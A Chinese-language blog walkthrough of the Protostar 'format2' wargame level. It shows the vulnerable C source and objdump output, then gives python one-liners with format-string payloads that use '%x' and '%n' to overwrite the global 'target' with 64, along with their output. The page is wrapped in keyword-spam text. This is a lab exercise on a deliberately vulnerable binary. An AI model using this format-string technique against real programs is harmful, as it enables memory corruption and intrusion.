中文字幕av专区_日韩电影在线播放_精品国产精品久久一区免费式_av在线免费观看网站

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

Protostar format2

發布時間:2020-07-07 15:06:38 來源:網絡 閱讀:507 作者:terrying 欄目:安全技術

About

This level moves on from format1 and shows how specific values can be written in memory.
This level is at /opt/protostar/bin/format2

Source code

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

int target;

void vuln()
{
char buffer[512];

fgets(buffer, sizeof(buffer), stdin);
printf(buffer);

if(target == 64) {
    printf("you have modified the target :)\n");
} else {
    printf("target is %d :(\n", target);
}
}

int main(int argc, char **argv)
{
vuln();
}

這題與上題有點區別:1、傳參改為fgets;2、target=64
同樣需要找到target的位置
user@protostar:/opt/protostar/bin$ objdump -t ./format2 | grep target
080496e4 g         O .bss     00000004                            target

同樣先找出賦值動作的位置:
user@protostar:/opt/protostar/bin$ python -c 'print "aaaaaaaa"+"%x."*150' | ./format2
aaaaaaaa200.b7fd8420.bffff624.61616161.61616161.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.a2e78.b7eada75.b7fd7ff4.80496b0.bffff7c8.8048338.b7ff1040.80496b0.bffff7f8.80484f9.b7fd8304.b7fd7ff4.80484e0.bffff7f8.b7ec6365.b7ff1040.bffff7f8.80484c6.80484e0.0.bffff878.b7eadc76.1.bffff8a4.bffff8ac.b7fe1848.bffff860.ffffffff.b7ffeff4.8048285.1.bffff860.b7ff0626.
target is 0 :(

nice,這次很近。同樣確認一下位置:
user@protostar:/opt/protostar/bin$ python -c 'print "aaaaaaaa%x%x%x%x"' | ./format2
aaaaaaaa200b7fd8420bffff62461616161
target is 0 :(
按照上一題的做法看看會發生什么事情 :
user@protostar:/opt/protostar/bin$ python -c 'print "\xe4\x96\x04\x08aaaa%x%x%x%n"' | ./format2
aaaa200b7fd8420bffff624
target is 27 :(
OK,這里已經成功更改了target的值了,題目要求是64,只需要將%x固定長度輸出即可:
user@protostar:/opt/protostar/bin$ python -c 'print "\xe4\x96\x04\x08aaaa%40x%x%x%n"' | ./format2
aaaa                                                                         200b7fd8420bffff624
you have modified the target :)




向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

许昌市| 池州市| 边坝县| 沙田区| 玉屏| 筠连县| 滦南县| 汝南县| 龙川县| 瓦房店市| 汨罗市| 安宁市| 洪江市| 东源县| 无锡市| 禄丰县| 彭泽县| 安多县| 平罗县| 合肥市| 汉川市| 攀枝花市| 九寨沟县| 景泰县| 尤溪县| 长丰县| 阳春市| 长沙县| 玉林市| 伊川县| 曲阳县| 娄烦县| 西乌| 临高县| 清水县| 陆河县| 靖安县| 闻喜县| 盈江县| 昌图县| 鲁甸县|